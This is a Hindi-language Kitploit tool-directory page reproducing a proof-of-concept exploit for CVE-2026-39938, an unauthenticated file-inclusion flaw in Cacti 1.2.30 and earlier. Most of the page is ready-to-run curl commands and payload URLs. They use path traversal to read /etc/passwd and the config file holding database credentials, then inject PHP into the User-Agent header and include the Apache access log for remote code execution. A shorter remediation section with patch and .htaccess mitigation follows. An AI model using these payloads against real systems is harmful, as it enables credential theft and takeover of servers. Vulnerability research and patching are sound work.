Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
By-Poloss..-..CVE-2026-39938 — CVE-2026-39938 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Cacti <= 1.2.30 में अप्रमाणित स्थानीय फ़ाइल समावेशन, जो लॉग विषाक्तता के माध्यम से मनमाना फ़ाइल पढ़ने और दूरस्थ कोड निष्पादन को सक्षम करता है। | Kitploit
उपकरण/GitHubGitHub/polosss/by-poloss..-..cve-2026-39938
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubpolosss/by-poloss..-..cve-2026-39938

By-Poloss..-..CVE-2026-39938

CVE-2026-39938 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: Cacti <= 1.2.30 में अप्रमाणित स्थानीय फ़ाइल समावेशन, जो लॉग विषाक्तता के माध्यम से मनमाना फ़ाइल पढ़ने और दूरस्थ कोड निष्पादन को सक्षम करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-39938: Cacti <= 1.2.30 - अनधिकृत LFI

कार्यकारी सारांश

फ़ील्डमान
CVE IDCVE-2026-39938
CVSS स्कोर9.8 (गंभीर)
प्रभावित उत्पादCacti
प्रभावित संस्करण<= 1.2.30
पैच किया गया संस्करण1.2.31
फिक्स कमिट9871f0c

भेद्यता विवरण

मूल कारण

यह भेद्यता lib/rrd.php में मौजूद है जहाँ graph_theme पैरामीटर को बिना सैनिटाइज़ेशन के सीधे उपयोग किया जाता है:

संवेदनशील कोड:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $rrdtheme = $config['base_path'] . '/include/themes/' . $graph_data_array['graph_theme'] . '/rrdtheme.php';
}

पैच किया गया कोड:

root@kitploit:~
if (isset($graph_data_array['graph_theme'])) {
    $theme = basename($graph_data_array['graph_theme']);
    if ($theme === '' || $theme === '.' || $theme === '..') {
        $theme = get_selected_theme();
    }
    $rrdtheme = $config['base_path'] . '/include/themes/' . $theme . '/rrdtheme.php';
}

समस्या: ../ पथ ट्रावर्सल अनुक्रमों के विरुद्ध कोई सत्यापन नहीं, जिससे हमलावर बिना प्रमाणीकरण के मनमानी फ़ाइलें पढ़ सकते हैं।


प्रूफ ऑफ कॉन्सेप्ट (PoC) - सरल चरण

चरण 1: भेद्यता सत्यापित करें - /etc/passwd पढ़ें

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd"

परिणाम: प्रतिक्रिया में /etc/passwd की सामग्री प्रदर्शित होगी।

चरण 2: डेटाबेस कॉन्फ़िगरेशन पढ़ें

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php"

परिणाम: डेटाबेस क्रेडेंशियल्स (उपयोगकर्ता नाम, पासवर्ड) उजागर हो जाएंगे।

चरण 3: लॉग पॉइज़निंग के माध्यम से रिमोट कोड निष्पादन

3.1 Apache लॉग में PHP कोड इंजेक्ट करें

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?local_graph_id=1" \
  -H "User-Agent: <?php system('id'); ?>"

3.2 लॉग फ़ाइल को शामिल करके कोड निष्पादित करें

root@kitploit:~
curl -k -s "http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log"

परिणाम: कमांड आउटपुट (जैसे, uid=33(www-data)) प्रदर्शित होगा।


सामान्य एंडपॉइंट जिनका परीक्षण किया गया


PoC URL उदाहरण

मूल LFI परीक्षण

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../etc/passwd

एप्लिकेशन कॉन्फ़िग पढ़ें

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../include/config.php

लॉग पॉइज़निंग (इंजेक्शन)

root@kitploit:~
http://target-cacti/graph_image.php?local_graph_id=1

हेडर के साथ: User-Agent: <?php system('id'); ?>

लॉग पॉइज़निंग (निष्पादन)

root@kitploit:~
http://target-cacti/graph_image.php?action=view&local_graph_id=1&graph_theme=../../../../../../../var/log/apache2/access.log

सुधार

पैच किए गए संस्करण में अपडेट करें

root@kitploit:~
cd /var/www/html/cacti
git fetch --tags
git checkout tags/release/1.2.31

पैच लागू हुआ सत्यापित करें

root@kitploit:~
grep -A 5 "if (isset(\$graph_data_array\['graph_theme'\]))" lib/rrd.php | grep basename

अस्थायी शमन (.htaccess)

root@kitploit:~
RewriteCond %{QUERY_STRING} (^|&)graph_theme=\.\./ [NC]
RewriteRule ^graph_image\.php$ - [F,L]

संदर्भ

  • GitHub सुरक्षा सलाह
  • पैच कमिट 9871f0c
  • NVD CVE-2026-39938

W.P.E.F

  • W.P.E.F टेलीग्राम चैनल #1
  • W.P.E.F टेलीग्राम चैनल #2

रिपोर्ट सुरक्षा अनुसंधान उद्देश्यों के लिए उत्पन्न की गई दिनांक: जून 27, 2026

टूल डाउनलोड करें
एंडपॉइंटपैरामीटरपेलोड उदाहरण
/graph_image.phpgraph_theme../../../../../../../etc/passwd
/graph_image.phpgraph_theme../../../../include/config.php
/graph_image.phpgraph_theme../../../../../../../var/log/apache2/access.log